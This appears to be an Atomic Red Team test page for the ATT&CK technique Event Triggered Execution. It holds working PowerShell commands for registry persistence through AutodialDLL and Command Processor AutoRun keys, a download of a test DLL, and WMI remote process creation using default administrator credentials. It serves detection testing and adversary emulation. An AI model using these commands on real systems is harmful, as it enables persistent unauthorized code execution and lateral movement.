Try it using Invoke-Atomic

Event Triggered Execution

Description from ATT&CK

Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.(Citation: Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)

Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)

Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges.

Atomic Tests

Atomic Test #1 - Persistence with Custom AutodialDLL

The DLL pointed to by the AutodialDLL registry key is loaded every time a process connects to the internet. Attackers can gain persistent code execution by setting this key to a DLL of their choice.

The sample dll provided, AltWinSock2DLL, will launch the notepad process. Starting and stopping a web browser such as MS Edge or Chrome should result in the dll executing. Blog

Supported Platforms: windows

auto_generated_guid: aca9ae16-7425-4b6d-8c30-cad306fdbd5b

Inputs:

None

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll

Cleanup Commands:

1
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value  $env:windir\system32\rasadhlp.dll

Dependencies: Run with powershell!

Description: AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll

Check Prereq Commands:

1
2
if (Test-Path PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll) { exit 0} else { exit 1}

Get Prereq Commands:

1
2
3
New-Item -Type Directory "PathToAtomicsFolder\T1546\bin\" -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546/bin/AltWinSock2DLL.dll" -OutFile "PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll"

Atomic Test #2 - HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)

An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed. reference

Supported Platforms: windows

auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532

Inputs:

Name Description Type Default Value
command Command to Execute string notepad.exe

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -Value "#{command}" -PropertyType "String"

Cleanup Commands:

1
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore

Atomic Test #3 - HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)

An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed. reference

Supported Platforms: windows

auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01

Inputs:

Name Description Type Default Value
command Command to Execute string notepad.exe

Attack Commands: Run with powershell!

1
2
3
4
5
$path = "HKCU:\Software\Microsoft\Command Processor"
if (!(Test-Path -path $path)){
  New-Item -ItemType Key -Path $path
}
New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"

Cleanup Commands:

1
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore

Atomic Test #4 - WMI Invoke-CimMethod Start Process

The following Atomic will create a New-CimSession on a remote endpoint and start a process usnig Invoke-CimMethod. This is a novel way to perform lateral movement or to start a remote process. This does require WinRM to be enabled. The account performing the run will also need to be elevated. A successful execution will stdout that the process started. On the remote endpoint, wmiprvse.exe will spawn the given process.

Supported Platforms: windows

auto_generated_guid: adae83d3-0df6-45e7-b2c3-575f91584577

Inputs:

Name Description Type Default Value
dest destination computer name string localhost
password password for account string P@ssword1
username account to use string Administrator
process process to spawn string calc.exe

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# Set the remote computer name and credentials
 $RemoteComputer = "#{dest}"
 $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword

 # Create a CIM session
 $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential

 # Define the process you want to start
 $ProcessToStart = "#{process}"

 # Invoke the Create method on the Win32_Process class to start the process
 $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart}

 # Check the result
 if ($Result.ReturnValue -eq 0) {
     Write-Host "Process started successfully with Process ID: $($Result.ProcessId)"
 } else {
     Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)"
 }

 # Clean up the CIM session
 Remove-CimSession -CimSession $CimSession 

source